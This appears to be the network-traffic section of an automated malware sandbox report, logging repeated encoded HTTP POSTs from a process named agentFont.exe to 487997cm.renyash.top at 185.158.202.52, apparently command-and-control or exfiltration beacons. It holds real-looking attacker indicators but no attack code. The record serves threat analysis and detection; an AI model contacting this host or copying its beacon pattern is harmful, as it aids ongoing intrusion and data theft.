                                                                                  Data Ascii: QRX^Q@U[Y_[RZXY]UWTXQX[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.<2R#=<25-V1?_$*Z5C.0/=+'$".=Y+*&X"#\.
                                                                                  Jan 1, 2025 11:27:25.214513063 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:25.350153923 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:21 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  8 | 192.168.2.4 | 49745 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:24.649671078 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:25.002738953 CET | 1340 | OUT | Data Raw: 51 57 5d 59 51 40 55 5f 59 5f 5b 52 5a 52 59 56 55 56 54 58 51 51 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QW]YQ@U_Y_[RZRYVUVTXQQ[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.()772=D-=71?"\3Z&66%'?!V) 5>&?:&X"#\.
                                                                                  Jan 1, 2025 11:27:25.286804914 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  9 | 192.168.2.4 | 49746 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:25.534331083 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:25.893359900 CET | 1044 | OUT | Data Raw: 51 55 5d 5b 54 47 55 5a 59 5f 5b 52 5a 59 59 55 55 5f 54 5a 51 5a 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QU][TGUZY_[RZYYUU_TZQZ[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.](. Y%.*B.U2:^3[!=P$<!>4$"=\):&X"#\.$
                                                                                  Jan 1, 2025 11:27:26.191607952 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:26.358649969 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  10 | 192.168.2.4 | 49747 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:26.537879944 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:26.893358946 CET | 1044 | OUT | Data Raw: 51 51 58 5b 54 4b 55 5b 59 5f 5b 52 5a 59 59 54 55 56 54 5f 51 51 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQX[TKU[Y_[RZYYTUVT_QQ[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.+T!V4=([%-.(1<"X$,*^"5'?!W=';![=]<:&X"#\.$
                                                                                  Jan 1, 2025 11:27:27.174480915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:27.302210093 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:23 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  11 | 192.168.2.4 | 49748 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:27.429351091 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:27.784048080 CET | 1044 | OUT | Data Raw: 51 57 5d 53 51 47 55 5e 59 5f 5b 52 5a 59 59 56 55 57 54 50 51 5c 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QW]SQGU^Y_[RZYYVUWTPQ\[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.]+:#=2>&--31?0<.X!C1Q32=B'Z6>)*&X"#\.$
                                                                                  Jan 1, 2025 11:27:28.075491905 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:28.207880974 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:24 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49749 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:28.338521957 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:28.690270901 CET1044OUTData Raw: 54 53 58 5b 54 44 50 5d 59 5f 5b 52 5a 5d 59 5d 55 57 54 5b 51 5e 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TSX[TDP]Y_[RZ]Y]UWT[Q^[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?T9W $2%.[012X0:[!6%U0/=Q)\5:)*&X"#\.
Jan 1, 2025 11:27:28.975112915 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:29.102004051 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49750 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:29.230258942 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:29.581619978 CET1044OUTData Raw: 51 50 5d 5c 54 47 55 51 59 5f 5b 52 5a 5c 59 57 55 51 54 5f 51 5a 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QP]\TGUQY_[RZ\YWUQT_QZ[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<2#>7%&A:[$1>3Z:X"C>0<!W>'06)<*&X"#\.0
Jan 1, 2025 11:27:29.885561943 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:30.017926931 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:26 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49751 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:30.157157898 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49752 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:30.383919001 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1324
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:30.737046957 CET1324OUTData Raw: 54 53 58 5f 54 4a 55 5b 59 5f 5b 52 5a 5a 59 52 55 52 54 5c 51 5e 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TSX_TJU[Y_[RZZYRURT\Q^[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^<!)#-2D97U$?X$*5&-U$)W+'#"."?&X"#\.
Jan 1, 2025 11:27:31.017585039 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:31.145549059 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 24 07 3e 1f 30 00 24 05 31 52 24 3e 3f 56 29 30 32 5d 3b 3f 3d 10 31 04 2b 00 28 0d 30 0a 3c 05 2a 15 2a 2d 2c 11 32 0c 34 54 31 35 2a 51 00 1c 23 5a 2b 2b 2b 59 3f 28 0f 0d 3d 21 28 07 2b 02 15 5a 21 14 38 0d 30 15 04 54 24 13 06 02 28 01 34 1c 2f 35 02 06 2c 33 06 02 30 0c 2f 52 09 14 21 11 2a 30 34 08 25 31 3e 5e 26 30 37 5b 22 01 33 13 34 22 35 57 37 1d 0d 5b 28 13 24 03 36 32 39 01 25 12 0f 18 3f 03 06 0b 22 14 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: $>0$1R$>?V)02];?=1+(0<**-,24T15*Q#Z+++Y?(=!(+Z!80T$(4/5,30/R!*04%1>^&07["34"5W7[($629%?"#T,#V6]Q


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49753 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:30.519539118 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:30.877692938 CET1044OUTData Raw: 51 51 58 5c 54 45 50 5e 59 5f 5b 52 5a 59 59 5c 55 51 54 5d 51 5b 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQX\TEP^Y_[RZYY\UQT]Q[[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.?2!T4=;1"@9;2Y-0<-"6!U%<!>(6-?&X"#\.$
Jan 1, 2025 11:27:31.175710917 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:31.309974909 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49754 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:31.459279060 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:31.815197945 CET1044OUTData Raw: 51 50 5d 5a 51 40 55 5e 59 5f 5b 52 5a 5c 59 50 55 5e 54 5b 51 5b 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QP]ZQ@U^Y_[RZ\YPU^T[Q[[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(1=4=X&A.-$29$^!&=0,1R>''["->?:&X"#\.0
Jan 1, 2025 11:27:32.096546888 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:32.230317116 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:28 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49755 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:32.377866983 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:32.737788916 CET1044OUTData Raw: 51 55 5d 5a 54 4b 50 5e 59 5f 5b 52 5a 5f 59 54 55 51 54 50 51 59 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QU]ZTKP^Y_[RZ_YTUQTPQY[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.^<29W7-,X%%:;W&<2_$*X6%-P%?=?![!]+:&X"#\.<
Jan 1, 2025 11:27:33.035856962 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:33.170300007 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:29 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49756 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:33.370345116 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:33.721585035 CET1044OUTData Raw: 54 54 5d 5a 54 40 50 5c 59 5f 5b 52 5a 5d 59 52 55 54 54 5d 51 5f 5b 5d 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TT]ZT@P\Y_[RZ]YRUTT]Q_[]^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.<"-$Y1=-9/T2<&3?*Z!&=0)P= "&(:&X"#\.
Jan 1, 2025 11:27:34.036830902 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:34.166069031 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49757 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:34.293577909 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:34.643373013 CET1044OUTData Raw: 54 53 5d 5a 51 40 55 5f 59 5f 5b 52 5a 52 59 54 55 53 54 50 51 58 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TS]ZQ@U_Y_[RZRYTUSTPQX[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?5V#=,1-&.>8&=',)!6=P3<6)$3]6.5+&X"#\.
Jan 1, 2025 11:27:34.940473080 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 11:27:35.076160908 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49758 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:35.209778070 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:35.571319103 CET1044OUTData Raw: 54 53 5d 53 51 40 55 50 59 5f 5b 52 5a 5c 59 56 55 56 54 5a 51 5e 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TS]SQ@UPY_[RZ\YVUVTZQ^[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.?2-S4 Y%&A:;U&<=%,65!U3-R=[5>%?&X"#\.0
Jan 1, 2025 11:27:35.846676111 CET | 25 | IN | HTTP/1.1 100 Continue
